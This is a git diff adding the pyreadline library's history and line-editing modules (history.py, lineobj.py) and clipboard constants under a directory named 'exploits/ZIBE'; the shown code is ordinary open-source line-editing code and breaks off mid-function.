CF_METAFILEPICT=3
|
||||
CF_SYLK=4
|
||||
CF_DIF=5
|
||||
CF_TIFF=6
|
||||
CF_OEMTEXT=7
|
||||
CF_DIB=8
|
||||
CF_PALETTE=9
|
||||
CF_PENDATA=10
|
||||
CF_RIFF=11
|
||||
CF_WAVE=12
|
||||
CF_UNICODETEXT=13
|
||||
CF_ENHMETAFILE=14
|
||||
CF_HDROP=15
|
||||
CF_LOCALE=16
|
||||
CF_MAX=17
|
||||
CF_OWNERDISPLAY=128
|
||||
CF_DSPTEXT=129
|
||||
CF_DSPBITMAP=130
|
||||
CF_DSPMETAFILEPICT=131
|
||||
CF_DSPENHMETAFILE=142
|
||||
CF_PRIVATEFIRST=512
|
||||
CF_PRIVATELAST=767
|
||||
CF_GDIOBJFIRST=768
|
||||
CF_GDIOBJLAST=1023
|
||||
|
||||
|
||||
GPTR=64
|
||||
GHND=66
|
||||
BIN
windows/exploits/ZIBE/pyreadline/lineeditor/__init__.pyc
Normal file
BIN
windows/exploits/ZIBE/pyreadline/lineeditor/__init__.pyc
Normal file
Binary file not shown.
264
windows/exploits/ZIBE/pyreadline/lineeditor/history.py
Normal file
264
windows/exploits/ZIBE/pyreadline/lineeditor/history.py
Normal file
|
|
@ -0,0 +1,264 @@
|
|||
# -*- coding: utf-8 -*-
|
||||
#*****************************************************************************
|
||||
# Copyright (C) 2006 Jorgen Stenarson. <jorgen.stenarson@bostream.nu>
|
||||
#
|
||||
# Distributed under the terms of the BSD License. The full license is in
|
||||
# the file COPYING, distributed as part of this software.
|
||||
#*****************************************************************************
|
||||
import re, operator,string, sys,os
|
||||
|
||||
from pyreadline.unicode_helper import ensure_unicode, ensure_str
|
||||
if u"pyreadline" in sys.modules:
|
||||
pyreadline = sys.modules[u"pyreadline"]
|
||||
else:
|
||||
import pyreadline
|
||||
|
||||
import lineobj
|
||||
|
||||
import exceptions
|
||||
|
||||
class EscapeHistory(exceptions.Exception):
|
||||
pass
|
||||
|
||||
from pyreadline.logger import log
|
||||
|
||||
|
||||
class LineHistory(object):
|
||||
def __init__(self):
|
||||
self.history = []
|
||||
self._history_length = 100
|
||||
self._history_cursor = 0
|
||||
self.history_filename = os.path.expanduser('~/.history') #Cannot expand unicode strings correctly on python2.4
|
||||
self.lastcommand = None
|
||||
self.query = u""
|
||||
self.last_search_for = u""
|
||||
|
||||
def get_current_history_length(self):
|
||||
u'''Return the number of lines currently in the history.
|
||||
(This is different from get_history_length(), which returns
|
||||
the maximum number of lines that will be written to a history file.)'''
|
||||
value = len(self.history)
|
||||
log(u"get_current_history_length:%d"%value)
|
||||
return value
|
||||
|
||||
def get_history_length(self):
|
||||
u'''Return the desired length of the history file. Negative values imply
|
||||
unlimited history file size.'''
|
||||
value = self._history_length
|
||||
log(u"get_history_length:%d"%value)
|
||||
return value
|
||||
|
||||
def get_history_item(self, index):
|
||||
u'''Return the current contents of history item at index (starts with index 1).'''
|
||||
item = self.history[index - 1]
|
||||
log(u"get_history_item: index:%d item:%r"%(index, item))
|
||||
return item.get_line_text()
|
||||
|
||||
def set_history_length(self, value):
|
||||
log(u"set_history_length: old:%d new:%d"%(self._history_length, value))
|
||||
self._history_length = value
|
||||
|
||||
def get_history_cursor(self):
|
||||
value = self._history_cursor
|
||||
log(u"get_history_cursor:%d"%value)
|
||||
return value
|
||||
|
||||
def set_history_cursor(self, value):
|
||||
log(u"set_history_cursor: old:%d new:%d"%(self._history_cursor, value))
|
||||
self._history_cursor = value
|
||||
|
||||
history_length = property(get_history_length, set_history_length)
|
||||
history_cursor = property(get_history_cursor, set_history_cursor)
|
||||
|
||||
def clear_history(self):
|
||||
u'''Clear readline history.'''
|
||||
self.history[:] = []
|
||||
self.history_cursor = 0
|
||||
|
||||
def read_history_file(self, filename=None):
|
||||
u'''Load a readline history file.'''
|
||||
if filename is None:
|
||||
filename = self.history_filename
|
||||
try:
|
||||
for line in open(filename, u'r'):
|
||||
self.add_history(lineobj.ReadLineTextBuffer(ensure_unicode(line.rstrip())))
|
||||
except IOError:
|
||||
self.history = []
|
||||
self.history_cursor = 0
|
||||
|
||||
def write_history_file(self, filename = None):
|
||||
u'''Save a readline history file.'''
|
||||
if filename is None:
|
||||
filename = self.history_filename
|
||||
fp = open(filename, u'wb')
|
||||
for line in self.history[-self.history_length:]:
|
||||
fp.write(ensure_str(line.get_line_text()))
|
||||
fp.write(u'\n')
|
||||
fp.close()
|
||||
|
||||
|
||||
def add_history(self, line):
|
||||
u'''Append a line to the history buffer, as if it was the last line typed.'''
|
||||
if not hasattr(line, "get_line_text"):
|
||||
line = lineobj.ReadLineTextBuffer(line)
|
||||
if not line.get_line_text():
|
||||
pass
|
||||
elif len(self.history) > 0 and self.history[-1].get_line_text() == line.get_line_text():
|
||||
pass
|
||||
else:
|
||||
self.history.append(line)
|
||||
self.history_cursor = len(self.history)
|
||||
|
||||
def previous_history(self, current): # (C-p)
|
||||
u'''Move back through the history list, fetching the previous command. '''
|
||||
if self.history_cursor == len(self.history):
|
||||
self.history.append(current.copy()) #do not use add_history since we do not want to increment cursor
|
||||
|
||||
if self.history_cursor > 0:
|
||||
self.history_cursor -= 1
|
||||
current.set_line(self.history[self.history_cursor].get_line_text())
|
||||
current.point = lineobj.EndOfLine
|
||||
|
||||
def next_history(self, current): # (C-n)
|
||||
u'''Move forward through the history list, fetching the next command. '''
|
||||
if self.history_cursor < len(self.history) - 1:
|
||||
self.history_cursor += 1
|
||||
current.set_line(self.history[self.history_cursor].get_line_text())
|
||||
|
||||
def beginning_of_history(self): # (M-<)
|
||||
u'''Move to the first line in the history.'''
|
||||
self.history_cursor = 0
|
||||
if len(self.history) > 0:
|
||||
self.l_buffer = self.history[0]
|
||||
|
||||
def end_of_history(self, current): # (M->)
|
||||
u'''Move to the end of the input history, i.e., the line currently
|
||||
being entered.'''
|
||||
self.history_cursor = len(self.history)
|
||||
current.set_line(self.history[-1].get_line_text())
|
||||
|
||||
def reverse_search_history(self, searchfor, startpos=None):
|
||||
if startpos is None:
|
||||
startpos = self.history_cursor
|
||||
origpos = startpos
|
||||
|
||||
result = lineobj.ReadLineTextBuffer("")
|
||||
|
||||
for idx, line in list(enumerate(self.history))[startpos:0:-1]:
|
||||
if searchfor in line:
|
||||
startpos = idx
|
||||
break
|
||||
|
||||
#If we get a new search without change in search term it means
|
||||
#someone pushed ctrl-r and we should find the next match
|
||||
if self.last_search_for == searchfor and startpos > 0:
|
||||
startpos -= 1
|
||||
for idx, line in list(enumerate(self.history))[startpos:0:-1]:
|
||||
if searchfor in line:
|
||||
startpos = idx
|
||||
break
|
||||
|
||||
if self.history:
|
||||
result = self.history[startpos].get_line_text()
|
||||
else:
|
||||
result = u""
|
||||
self.history_cursor = startpos
|
||||
self.last_search_for = searchfor
|
||||
log(u"reverse_search_history: old:%d new:%d result:%r"%(origpos, self.history_cursor, result))
|
||||
return result
|
||||
|
||||
def forward_search_history(self, searchfor, startpos=None):
|
||||
if startpos is None:
|
||||
startpos = min(self.history_cursor, max(0, self.get_current_history_length()-1))
|
||||
origpos = startpos
|
||||
|
||||
result = lineobj.ReadLineTextBuffer("")
|
||||
|
||||
for idx, line in list(enumerate(self.history))[startpos:]:
|
||||
if searchfor in line:
|
||||
startpos = idx
|
||||
break
|
||||
|
||||
#If we get a new search without change in search term it means
|
||||
#someone pushed ctrl-r and we should find the next match
|
||||
if self.last_search_for == searchfor and startpos < self.get_current_history_length()-1:
|
||||
startpos += 1
|
||||
for idx, line in list(enumerate(self.history))[startpos:]:
|
||||
if searchfor in line:
|
||||
startpos = idx
|
||||
break
|
||||
|
||||
if self.history:
|
||||
result = self.history[startpos].get_line_text()
|
||||
else:
|
||||
result = u""
|
||||
self.history_cursor = startpos
|
||||
self.last_search_for = searchfor
|
||||
return result
|
||||
|
||||
def _search(self, direction, partial):
|
||||
try:
|
||||
if (self.lastcommand != self.history_search_forward and
|
||||
self.lastcommand != self.history_search_backward):
|
||||
self.query = u''.join(partial[0:partial.point].get_line_text())
|
||||
hcstart = max(self.history_cursor,0)
|
||||
hc = self.history_cursor + direction
|
||||
while (direction < 0 and hc >= 0) or (direction > 0 and hc < len(self.history)):
|
||||
h = self.history[hc]
|
||||
if not self.query:
|
||||
self.history_cursor = hc
|
||||
result = lineobj.ReadLineTextBuffer(h, point=len(h.get_line_text()))
|
||||
return result
|
||||
elif (h.get_line_text().startswith(self.query) and (h != partial.get_line_text())):
|
||||
self.history_cursor = hc
|
||||
result = lineobj.ReadLineTextBuffer(h, point=partial.point)
|
||||
return result
|
||||
hc += direction
|
||||
else:
|
||||
if len(self.history) == 0:
|
||||
pass
|
||||
elif hc >= len(self.history) and not self.query:
|
||||
self.history_cursor = len(self.history)
|
||||
return lineobj.ReadLineTextBuffer(u"", point=0)
|
||||
elif self.history[max(min(hcstart, len(self.history) - 1), 0)]\
|
||||
.get_line_text().startswith(self.query) and self.query:
|
||||
return lineobj.ReadLineTextBuffer(self.history\
|
||||
[max(min(hcstart, len(self.history) - 1),0)],
|
||||
point = partial.point)
|
||||
else:
|
||||
return lineobj.ReadLineTextBuffer(partial,
|
||||
point=partial.point)
|
||||
return lineobj.ReadLineTextBuffer(self.query,
|
||||
point=min(len(self.query),
|
||||
partial.point))
|
||||
except IndexError:
|
||||
raise
|
||||
|
||||
def history_search_forward(self, partial): # ()
|
||||
u'''Search forward through the history for the string of characters
|
||||
between the start of the current line and the point. This is a
|
||||
non-incremental search. By default, this command is unbound.'''
|
||||
q= self._search(1, partial)
|
||||
return q
|
||||
|
||||
def history_search_backward(self, partial): # ()
|
||||
u'''Search backward through the history for the string of characters
|
||||
between the start of the current line and the point. This is a
|
||||
non-incremental search. By default, this command is unbound.'''
|
||||
|
||||
q= self._search(-1, partial)
|
||||
return q
|
||||
|
||||
if __name__==u"__main__":
|
||||
import pdb
|
||||
q = LineHistory()
|
||||
r = LineHistory()
|
||||
s = LineHistory()
|
||||
RL = lineobj.ReadLineTextBuffer
|
||||
q.add_history(RL(u"aaaa"))
|
||||
q.add_history(RL(u"aaba"))
|
||||
q.add_history(RL(u"aaca"))
|
||||
q.add_history(RL(u"akca"))
|
||||
q.add_history(RL(u"bbb"))
|
||||
q.add_history(RL(u"ako"))
|
||||
r.add_history(RL(u"ako"))
|
||||
799
windows/exploits/ZIBE/pyreadline/lineeditor/lineobj.py
Normal file
799
windows/exploits/ZIBE/pyreadline/lineeditor/lineobj.py
Normal file
|
|
@ -0,0 +1,799 @@
|
|||
# -*- coding: utf-8 -*-
|
||||
#*****************************************************************************
|
||||
# Copyright (C) 2006 Jorgen Stenarson. <jorgen.stenarson@bostream.nu>
|
||||
#
|
||||
# Distributed under the terms of the BSD License. The full license is in
|
||||
# the file COPYING, distributed as part of this software.
|
||||
#*****************************************************************************
|
||||
import re, operator, sys
|
||||
|
||||
import wordmatcher
|
||||
import pyreadline.clipboard as clipboard
|
||||
from pyreadline.logger import log
|
||||
from pyreadline.unicode_helper import ensure_unicode
|
||||
|
||||
kill_ring_to_clipboard = False #set to true to copy every addition to kill ring to clipboard
|
||||
|
||||
|
||||
class NotAWordError(IndexError):
|
||||
pass
|
||||
|
||||
|
||||
def quote_char(c):
|
||||
if ord(c) > 0:
|
||||
return c
|
||||
|
||||
############## Line positioner ########################
|
||||
|
||||
class LinePositioner(object):
|
||||
def __call__(self, line):
|
||||
NotImplementedError(u"Base class !!!")
|
||||
|
||||
class NextChar(LinePositioner):
|
||||
def __call__(self, line):
|
||||
if line.point < len(line.line_buffer):
|
||||
return line.point + 1
|
||||
else:
|
||||
return line.point
|
||||
NextChar = NextChar()
|
||||
|
||||
class PrevChar(LinePositioner):
|
||||
def __call__(self, line):
|
||||
if line.point > 0:
|
||||
return line.point - 1
|
||||
else:
|
||||
return line.point
|
||||
PrevChar = PrevChar()
|
||||
|
||||
class NextWordStart(LinePositioner):
|
||||
def __call__(self, line):
|
||||
return line.next_start_segment(line.line_buffer, line.is_word_token)[line.point]
|
||||
NextWordStart = NextWordStart()
|
||||
|
||||
class NextWordEnd(LinePositioner):
|
||||
def __call__(self, line):
|
||||
return line.next_end_segment(line.line_buffer, line.is_word_token)[line.point]
|
||||
NextWordEnd = NextWordEnd()
|
||||
|
||||
class PrevWordStart(LinePositioner):
|
||||
def __call__(self, line):
|
||||
return line.prev_start_segment(line.line_buffer, line.is_word_token)[line.point]
|
||||
PrevWordStart = PrevWordStart()
|
||||
|
||||
|
||||
class WordStart(LinePositioner):
|
||||
def __call__(self, line):
|
||||
if line.is_word_token(line.get_line_text()[Point(line):Point(line) + 1]):
|
||||
if Point(line) > 0 and line.is_word_token(line.get_line_text()[Point(line) - 1:Point(line)]):
|
||||
return PrevWordStart(line)
|
||||
else:
|
||||
return line.point
|
||||
else:
|
||||
raise NotAWordError(u"Point is not in a word")
|
||||
WordStart = WordStart()
|
||||
|
||||
class WordEnd(LinePositioner):
|
||||
def __call__(self, line):
|
||||
if line.is_word_token(line.get_line_text()[Point(line):Point(line) + 1]):
|
||||
if line.is_word_token(line.get_line_text()[Point(line) + 1:Point(line) + 2]):
|
||||
return NextWordEnd(line)
|
||||
else:
|
||||
return line.point
|
||||
else:
|
||||
raise NotAWordError(u"Point is not in a word")
|
||||
WordEnd = WordEnd()
|
||||
|
||||
class PrevWordEnd(LinePositioner):
|
||||
def __call__(self, line):
|
||||
return line.prev_end_segment(line.line_buffer, line.is_word_token)[line.point]
|
||||
PrevWordEnd = PrevWordEnd()
|
||||
|
||||
class PrevSpace(LinePositioner):
|
||||
def __call__(self, line):
|
||||
point = line.point
|
||||
if line[point - 1:point].get_line_text() == u" ":
|
||||
while point > 0 and line[point - 1:point].get_line_text() == u" ":
|
||||
point -= 1
|
||||
while point > 0 and line[point - 1:point].get_line_text() != u" ":
|
||||
point -= 1
|
||||
return point
|
||||
PrevSpace = PrevSpace()
|
||||
|
||||
|
||||
class StartOfLine(LinePositioner):
|
||||
def __call__(self, line):
|
||||
return 0
|
||||
StartOfLine = StartOfLine()
|
||||
|
||||
class EndOfLine(LinePositioner):
|
||||
def __call__(self, line):
|
||||
return len(line.line_buffer)
|
||||
EndOfLine = EndOfLine()
|
||||
|
||||
class Point(LinePositioner):
|
||||
def __call__(self, line):
|
||||
return line.point
|
||||
Point = Point()
|
||||
|
||||
class Mark(LinePositioner):
|
||||
def __call__(self, line):
|
||||
return line.mark
|
||||
k = Mark()
|
||||
|
||||
all_positioners = [(value.__class__.__name__, value)
|
||||
for key, value in globals().items()
|
||||
if isinstance(value, LinePositioner)]
|
||||
all_positioners.sort()
|
||||
|
||||
############### LineSlice #################
|
||||
|
||||
class LineSlice(object):
|
||||
def __call__(self, line):
|
||||
NotImplementedError(u"Base class !!!")
|
||||
|
||||
|
||||
class CurrentWord(LineSlice):
|
||||
def __call__(self, line):
|
||||
return slice(WordStart(line), WordEnd(line), None)
|
||||
CurrentWord = CurrentWord()
|
||||
|
||||
class NextWord(LineSlice):
|
||||
def __call__(self, line):
|
||||
work = TextLine(line)
|
||||
work.point = NextWordStart
|
||||
start = work.point
|
||||
stop = NextWordEnd(work)
|
||||
return slice(start, stop)
|
||||
NextWord = NextWord()
|
||||
|
||||
class PrevWord(LineSlice):
|
||||
def __call__(self, line):
|
||||
work = TextLine(line)
|
||||
work.point = PrevWordEnd
|
||||
stop = work.point
|
||||
start = PrevWordStart(work)
|
||||
return slice(start, stop)
|
||||
PrevWord = PrevWord()
|
||||
|
||||
class PointSlice(LineSlice):
|
||||
def __call__(self, line):
|
||||
return slice(Point(line), Point(line) + 1, None)
|
||||
PointSlice = PointSlice()
|
||||
|
||||
|
||||
############### TextLine ######################
|
||||
|
||||
class TextLine(object):
|
||||
def __init__(self, txtstr, point = None, mark = None):
|
||||
self.line_buffer = []
|
||||
self._point = 0
|
||||
self.mark = -1
|
||||
self.undo_stack = []
|
||||
self.overwrite = False
|
||||
if isinstance(txtstr, TextLine): #copy
|
||||
self.line_buffer = txtstr.line_buffer[:]
|
||||
if point is None:
|
||||
self.point = txtstr.point
|
||||
else:
|
||||
self.point = point
|
||||
if mark is None:
|
||||
self.mark = txtstr.mark
|
||||
else:
|
||||
self.mark = mark
|
||||
else:
|
||||
self._insert_text(txtstr)
|
||||
if point is None:
|
||||
self.point = 0
|
||||
else:
|
||||
self.point = point
|
||||
if mark is None:
|
||||
self.mark = -1
|
||||
else:
|
||||
self.mark = mark
|
||||
|
||||
self.is_word_token = wordmatcher.is_word_token
|
||||
self.next_start_segment = wordmatcher.next_start_segment
|
||||
self.next_end_segment = wordmatcher.next_end_segment
|
||||
self.prev_start_segment = wordmatcher.prev_start_segment
|
||||
self.prev_end_segment = wordmatcher.prev_end_segment
|
||||
|
||||
def push_undo(self):
|
||||
ltext = self.get_line_text()
|
||||
if self.undo_stack and ltext == self.undo_stack[-1].get_line_text():
|
||||
self.undo_stack[-1].point = self.point
|
||||
else:
|
||||
self.undo_stack.append(self.copy())
|
||||
|
||||
def pop_undo(self):
|
||||
if len(self.undo_stack) >= 2:
|
||||
self.undo_stack.pop()
|
||||
self.set_top_undo()
|
||||
self.undo_stack.pop()
|
||||
else:
|
||||
self.reset_line()
|
||||
self.undo_stack = []
|
||||
|
||||
def set_top_undo(self):
|
||||
if self.undo_stack:
|
||||
undo = self.undo_stack[-1]
|
||||
self.line_buffer = undo.line_buffer
|
||||
self.point = undo.point
|
||||
self.mark = undo.mark
|
||||
else:
|
||||
pass
|
||||
|
||||
def __repr__(self):
|
||||
return u'TextLine("%s",point=%s,mark=%s)'%(self.line_buffer, self.point, self.mark)
|
||||
|
||||
def copy(self):
|
||||
return self.__class__(self)
|
||||
|
||||
def set_point(self,value):
|
||||
if isinstance(value, LinePositioner):
|
||||
value = value(self)
|
||||
assert (value <= len(self.line_buffer))
|
||||
if value > len(self.line_buffer):
|
||||
value = len(self.line_buffer)
|
||||
self._point = value
|
||||
def get_point(self):
|
||||
return self._point
|
||||
point = property(get_point, set_point)
|
||||
|
||||
|
||||
def visible_line_width(self, position = Point):
|
||||
"""Return the visible width of the text in line buffer up to position."""
|
||||
extra_char_width = len([ None for c in self[:position].line_buffer if 0x2013 <= ord(c) <= 0xFFFD])
|
||||
return len(self[:position].quoted_text()) + self[:position].line_buffer.count(u"\t")*7 + extra_char_width
|
||||
|
||||
def quoted_text(self):
|
||||
quoted = [ quote_char(c) for c in self.line_buffer ]
|
||||
self.line_char_width = [ len(c) for c in quoted ]
|
||||
return u''.join(map(ensure_unicode, quoted))
|
||||
|
||||
def get_line_text(self):
|
||||
buf = self.line_buffer
|
||||
buf = map(ensure_unicode, buf)
|
||||
return u''.join(buf)
|
||||
|
||||
def set_line(self, text, cursor = None):
|
||||
self.line_buffer = [ c for c in str(text) ]
|
||||
if cursor is None:
|
||||
self.point = len(self.line_buffer)
|
||||
else:
|
||||
self.point = cursor
|
||||
|
||||
def reset_line(self):
|
||||
self.line_buffer = []
|
||||
self.point = 0
|
||||
|
||||
def end_of_line(self):
|
||||
self.point = len(self.line_buffer)
|
||||
|
||||
def _insert_text(self, text, argument=1):
|
||||
text = text * argument
|
||||
if self.overwrite:
|
||||
for c in text:
|
||||
#if self.point:
|
||||
self.line_buffer[self.point] = c
|
||||
self.point += 1
|
||||
else:
|
||||
for c in text:
|
||||
self.line_buffer.insert(self.point, c)
|
||||
self.point += 1
|
||||
|
||||
def __getitem__(self, key):
|
||||
#Check if key is LineSlice, convert to regular slice
|
||||
#and continue processing
|
||||
if isinstance(key, LineSlice):
|
||||
key = key(self)
|
||||
if isinstance(key, slice):
|
||||
if key.step is None:
|
||||
pass
|
||||
else:
|
||||
raise Error
|
||||
if key.start is None:
|
||||
start = StartOfLine(self)
|
||||
elif isinstance(key.start,LinePositioner):
|
||||
start = key.start(self)
|
||||
else:
|
||||
start = key.start
|
||||
if key.stop is None:
|
||||
stop = EndOfLine(self)
|
||||
elif isinstance(key.stop, LinePositioner):
|
||||
stop = key.stop(self)
|
||||
else:
|
||||
stop = key.stop
|
||||
return self.__class__(self.line_buffer[start:stop], point=0)
|
||||
elif isinstance(key, LinePositioner):
|
||||
return self.line_buffer[key(self)]
|
||||
elif isinstance(key, tuple):
|
||||
raise IndexError(u"Cannot use step in line buffer indexing") #Multiple slice not allowed
|
||||
else:
|
||||
# return TextLine(self.line_buffer[key])
|
||||
return self.line_buffer[key]
|
||||
|
||||
def __delitem__(self, key):
|
||||
point = self.point
|
||||
if isinstance(key, LineSlice):
|
||||
key = key(self)
|
||||
if isinstance(key, slice):
|
||||
start = key.start
|
||||
stop = key.stop
|
||||
if isinstance(start, LinePositioner):
|
||||
start = start(self)
|
||||
elif start is None:
|
||||
start=0
|
||||
if isinstance(stop, LinePositioner):
|
||||
stop = stop(self)
|
||||
elif stop is None:
|
||||
stop = EndOfLine(self)
|
||||
elif isinstance(key, LinePositioner):
|
||||
start = key(self)
|
||||
stop = start + 1
|
||||
else:
|
||||
start = key
|
||||
stop = key + 1
|
||||
prev = self.line_buffer[:start]
|
||||
rest = self.line_buffer[stop:]
|
||||
self.line_buffer = prev + rest
|
||||
if point > stop:
|
||||
self.point = point - (stop - start)
|
||||
elif point >= start and point <= stop:
|
||||
self.point = start
|
||||
|
||||
|
||||
def __setitem__(self, key, value):
|
||||
if isinstance(key, LineSlice):
|
||||
key = key(self)
|
||||
if isinstance(key, slice):
|
||||
start = key.start
|
||||
stop = key.stop
|
||||
elif isinstance(key, LinePositioner):
|
||||
start = key(self)
|
||||
stop = start + 1
|
||||
else:
|
||||
start = key
|
||||
stop = key + 1
|
||||
prev = self.line_buffer[:start]
|
||||
value = self.__class__(value).line_buffer
|
||||
rest = self.line_buffer[stop:]
|
||||
out = prev + value + rest
|
||||
if len(out) >= len(self):
|
||||
self.point = len(self)
|
||||
self.line_buffer = out
|
||||
|
||||
def __len__(self):
|
||||
return len(self.line_buffer)
|
||||
|
||||
def upper(self):
|
||||
self.line_buffer = [x.upper() for x in self.line_buffer]
|
||||
return self
|
||||
|
||||
def lower(self):
|
||||
self.line_buffer = [x.lower() for x in self.line_buffer]
|
||||
return self
|
||||
|
||||
def capitalize(self):
|
||||
self.set_line(self.get_line_text().capitalize(), self.point)
|
||||
return self
|
||||
|
||||
def startswith(self, txt):
|
||||
return self.get_line_text().startswith(txt)
|
||||
|
||||
def endswith(self, txt):
|
||||
return self.get_line_text().endswith(txt)
|
||||
|
||||
def __contains__(self, txt):
|
||||
return txt in self.get_line_text()
|
||||
|
||||
|
||||
lines = [TextLine(u"abc"),
|
||||
TextLine(u"abc def"),
|
||||
TextLine(u"abc def ghi"),
|
||||
TextLine(u" abc def "),
|
||||
]
|
||||
l = lines[2]
|
||||
l.point = 5
|
||||
|
||||
|
||||
|
||||
class ReadLineTextBuffer(TextLine):
|
||||
def __init__(self,txtstr, point = None, mark = None):
|
||||
super(ReadLineTextBuffer, self).__init__(txtstr, point, mark)
|
||||
self.enable_win32_clipboard = True
|
||||
self.selection_mark = -1
|
||||
self.enable_selection = True
|
||||
self.kill_ring = []
|
||||
|
||||
def __repr__(self):
|
||||
return u'ReadLineTextBuffer'\
|
||||
u'("%s",point=%s,mark=%s,selection_mark=%s)'%\
|
||||
(self.line_buffer, self.point, self.mark,self.selection_mark)
|
||||
|
||||
|
||||
def insert_text(self, char, argument=1):
|
||||
self.delete_selection()
|
||||
self.selection_mark = -1
|
||||
self._insert_text(char, argument)
|
||||
|
||||
def to_clipboard(self):
|
||||
if self.enable_win32_clipboard:
|
||||
clipboard.set_clipboard_text(self.get_line_text())
|
||||
|
||||
######### Movement
|
||||
|
||||
def beginning_of_line(self):
|
||||
self.selection_mark = -1
|
||||
self.point = StartOfLine
|
||||
|
||||
def end_of_line(self):
|
||||
self.selection_mark = -1
|
||||
self.point = EndOfLine
|
||||
|
||||
def forward_char(self,argument = 1):
|
||||
if argument < 0:
|
||||
self.backward_char(-argument)
|
||||
self.selection_mark = -1
|
||||
for x in range(argument):
|
||||
self.point = NextChar
|
||||
|
||||
def backward_char(self, argument=1):
|
||||
if argument < 0:
|
||||
self.forward_char(-argument)
|
||||
self.selection_mark = -1
|
||||
for x in range(argument):
|
||||
self.point = PrevChar
|
||||
|
||||
def forward_word(self,argument=1):
|
||||
if argument<0:
|
||||
self.backward_word(-argument)
|
||||
self.selection_mark=-1
|
||||
for x in range(argument):
|
||||
self.point = NextWordStart
|
||||
|
||||
def backward_word(self, argument=1):
|
||||
if argument < 0:
|
||||
self.forward_word(-argument)
|
||||
self.selection_mark = -1
|
||||
for x in range(argument):
|
||||
self.point = PrevWordStart
|
||||
|
||||
def forward_word_end(self, argument=1):
|
||||
if argument < 0:
|
||||
self.backward_word_end(-argument)
|
||||
self.selection_mark = -1
|
||||
for x in range(argument):
|
||||
self.point = NextWordEnd
|
||||
|
||||
def backward_word_end(self, argument=1):
|
||||
if argument < 0:
|
||||
self.forward_word_end(-argument)
|
||||
self.selection_mark = -1
|
||||
for x in range(argument):
|
||||
self.point = NextWordEnd
|
||||
|
||||
######### Movement select
|
||||
def beginning_of_line_extend_selection(self):
|
||||
if self.enable_selection and self.selection_mark < 0:
|
||||
self.selection_mark = self.point
|
||||
self.point = StartOfLine
|
||||
|
||||
def end_of_line_extend_selection(self):
|
||||
if self.enable_selection and self.selection_mark < 0:
|
||||
self.selection_mark = self.point
|
||||
self.point = EndOfLine
|
||||
|
||||
def forward_char_extend_selection(self,argument=1):
|
||||
if argument < 0:
|
||||
self.backward_char_extend_selection(-argument)
|
||||
if self.enable_selection and self.selection_mark < 0:
|
||||
self.selection_mark = self.point
|
||||
for x in range(argument):
|
||||
self.point = NextChar
|
||||
|
||||
def backward_char_extend_selection(self, argument=1):
|
||||
if argument < 0:
|
||||
self.forward_char_extend_selection(-argument)
|
||||
if self.enable_selection and self.selection_mark < 0:
|
||||
self.selection_mark = self.point
|
||||
for x in range(argument):
|
||||
self.point = PrevChar
|
||||
|
||||
def forward_word_extend_selection(self, argument=1):
|
||||
if argument < 0:
|
||||
self.backward_word_extend_selection(-argument)
|
||||
if self.enable_selection and self.selection_mark < 0:
|
||||
self.selection_mark = self.point
|
||||
for x in range(argument):
|
||||
self.point = NextWordStart
|
||||
|
||||
def backward_word_extend_selection(self, argument=1):
|
||||
if argument < 0:
|
||||
self.forward_word_extend_selection(-argument)
|
||||
if self.enable_selection and self.selection_mark < 0:
|
||||
self.selection_mark = self.point
|
||||
for x in range(argument):
|
||||
self.point = PrevWordStart
|
||||
|
||||
|
||||
def forward_word_end_extend_selection(self, argument=1):
|
||||
if argument < 0:
|
||||
self.backward_word_end_extend_selection(-argument)
|
||||
if self.enable_selection and self.selection_mark < 0:
|
||||
self.selection_mark = self.point
|
||||
for x in range(argument):
|
||||
self.point = NextWordEnd
|
||||
|
||||
def backward_word_end_extend_selection(self, argument=1):
|
||||
if argument < 0:
|
||||
self.forward_word_end_extend_selection(-argument)
|
||||
if self.enable_selection and self.selection_mark < 0:
|
||||
self.selection_mark = self.point
|
||||
for x in range(argument):
|
||||
self.point = PrevWordEnd
|
||||
|
||||
|
||||
######### delete
|
||||
|
||||
def delete_selection(self):
|
||||
if self.enable_selection and self.selection_mark >= 0:
|
||||
if self.selection_mark < self.point:
|
||||
del self[self.selection_mark:self.point]
|
||||
self.selection_mark = -1
|
||||
else:
|
||||
del self[self.point:self.selection_mark]
|
||||
self.selection_mark = -1
|
||||
return True
|
||||
else:
|
||||
self.selection_mark = -1
|
||||
return False
|
||||
|
||||
def delete_char(self, argument=1):
|
||||
if argument < 0:
|
||||
self.backward_delete_char(-argument)
|
||||
if self.delete_selection():
|
||||
argument -= 1
|
||||
for x in range(argument):
|
||||
del self[Point]
|
||||
|
||||
def backward_delete_char(self, argument=1):
|
||||
if argument < 0:
|
||||
self.delete_char(-argument)
|
||||
if self.delete_selection():
|
||||
argument -= 1
|
||||
for x in range(argument):
|
||||
if self.point > 0:
|
||||
self.backward_char()
|
||||
self.delete_char()
|
||||
|
||||
def forward_delete_word(self, argument=1):
|
||||
if argument < 0:
|
||||
self.backward_delete_word(-argument)
|
||||
if self.delete_selection():
|
||||
argument -= 1
|
||||
for x in range(argument):
|
||||
del self[Point:NextWordStart]
|
||||
|
||||
def backward_delete_word(self, argument=1):
|
||||
if argument < 0:
|
||||
self.forward_delete_word(-argument)
|
||||
if self.delete_selection():
|
||||
argument -= 1
|
||||
for x in range(argument):
|
||||
del self[PrevWordStart:Point]
|
||||
|
||||
def delete_current_word(self):
|
||||
if not self.delete_selection():
|
||||
del self[CurrentWord]
|
||||
self.selection_mark =- 1
|
||||
|
||||
def delete_horizontal_space(self):
|
||||
if self[Point] in " \t":
|
||||
del self[PrevWordEnd:NextWordStart]
|
||||
self.selection_mark = -1
|
||||
######### Case
|
||||
|
||||
def upcase_word(self):
|
||||
p = self.point
|
||||
try:
|
||||
self[CurrentWord] = self[CurrentWord].upper()
|
||||
self.point = p
|
||||
except NotAWordError:
|
||||
pass
|
||||
|
||||
def downcase_word(self):
|
||||
p = self.point
|
||||
try:
|
||||
self[CurrentWord] = self[CurrentWord].lower()
|
||||
self.point = p
|
||||
except NotAWordError:
|
||||
pass
|
||||
|
||||
def capitalize_word(self):
|
||||
p = self.point
|
||||
try:
|
||||
self[CurrentWord] = self[CurrentWord].capitalize()
|
||||
self.point = p
|
||||
except NotAWordError:
|
||||
pass
|
||||
########### Transpose
|
||||
def transpose_chars(self):
|
||||
p2 = Point(self)
|
||||
if p2 == 0:
|
||||
return
|
||||
elif p2 == len(self):
|
||||
p2 = p2 - 1
|
||||
p1 = p2 - 1
|
||||
self[p2], self[p1] = self[p1], self[p2]
|
||||
self.point = p2 + 1
|
||||
|
||||
def transpose_words(self):
|
||||
word1 = TextLine(self)
|
||||
word2 = TextLine(self)
|
||||
if self.point == len(self):
|
||||
